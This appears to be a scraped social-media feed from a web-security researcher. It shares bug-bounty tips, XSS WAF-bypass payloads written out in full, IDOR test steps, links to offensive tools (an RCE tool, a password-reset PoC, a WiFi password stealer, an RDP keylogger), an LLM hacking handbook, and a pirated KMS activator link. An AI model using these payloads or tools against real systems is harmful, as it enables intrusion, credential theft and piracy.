Al1ex

UPDATE my github profile "readme.md" ~ github.com/Al1ex ID: Al1ex Team: Heptagram Official account：Heptagram Lab Research direction： Web Penetration，Mobile Security, Code Audit，Emergency Response, Intranet Penetration, Blockchain Security

🤖 LLM Hacker's Handbook: A Practical Guide to LLM Hacking. Handbook: doublespeak.chat/#/handbook #infosec #llm

XSS Bypass Payload: 1'"><img/src/onerror​=.1|alert``> #bughunter #infosec #hacking #Hacker #bugbountytips

🚨 Do not use Curve Finance frontend until further notice.

nowafpls Burp Plugin to Bypass WAFs through the insertion of Junk Data github.com/assetnote/nowa… #pentesting #redteam #bugbounty #cybersecurity

MetabaseRceTools Metabase Rce Tools CVE-2023-38646 github.com/Boogipop/Metab… #cve #cybersecurity #infosec

MSSQLRelay Microsoft SQL Relay is an offensive tool for auditing and abusing Microsoft SQL (MSSQL) services. github.com/CompassSecurit… #cybersecurity #infosec

CVE-2023-42820 PoC for CVE-2023-42820 JumpServer Password Reset Vulnerability github.com/C1ph3rX13/CVE-… #cve #cybersecurity #infosec

How DNS Works? Credit: Cloudairy #cybersecurity #infosec

WiFi password stealer Simple Windows and Linux keystroke injection tool that exfiltrates stored WiFi data (SSID and password). github.com/AleksaMCode/Wi… #cybersecurity #infosec #pentesting #redteam

📋 Windows/Office 激活工具 HEU KMS Activator v40.0 #Windows 📌 Links: tmioe.com/956.html

TakeMyRDP 2.0 A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes, It utilizes a low-level keyboard input hook, allowing it to record keystrokes in certain contexts... github.com/nocerainfosec/… #infosec #pentesting #redteam

http://xxxx/__clockwork/latest

Advanced Cross-Site Scripting (XSS) Attacks, Payloads And Bypass Technics - Crackcodes crackcodes.in/2023/06/advanc…

#工具分享 如果你想将本地 localhost 的网络暴露到互联网中，可以试试 tabserve.dev 这个工具。 它使用 Cloudflare Worker 和 Web Worker 来创建互联网到本地主机的反向代理，无需在本地安装 CLI 等工具，没有安全隐患，还可以用 Chrome 来调试，非常不错👍

今天才发现 Google 居然有一个免费的无代码建站工具。 Google Sites sites.google.com 试用了一下： * 模版种类挺多，很不错，现代好看。 * 交互也还可以。 * 响应式支持。 * 发布的时候支持绑定自定义域名。 如果你要快速做一个静态站点的话，可以考虑一下，不过按照 Google 经常关闭服务的德行，使用的时候还是要注意一点。

I found a SQL on one URL but properly secured. But found @LiveOverflow new video "HTML Sanitizer Bypass Investigation". I give it a try and I was able to bypass Cloudflare which leads to XSS. payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/

How did I test the IDOR vulnerability that leads to all user Data leakage? 1:Change the /me endpoint to /users. 2.Change the GET method to the POST method. 3.Add the Content-Type: application/json header. 4.Add this payload to the HTTP request body. {"ids":["1"]} #bugbountytips

Wireless Pentesting CheatSheet This repository contain a CheatSheet for OSWP & WiFi Cracking. github.com/V0lk3n/Wireles… #cybersecurity #infosec #pentesting t.me/hackgit/9193

一些XSS跨站绕WAF的新姿势 portswigger.net/web-security/c…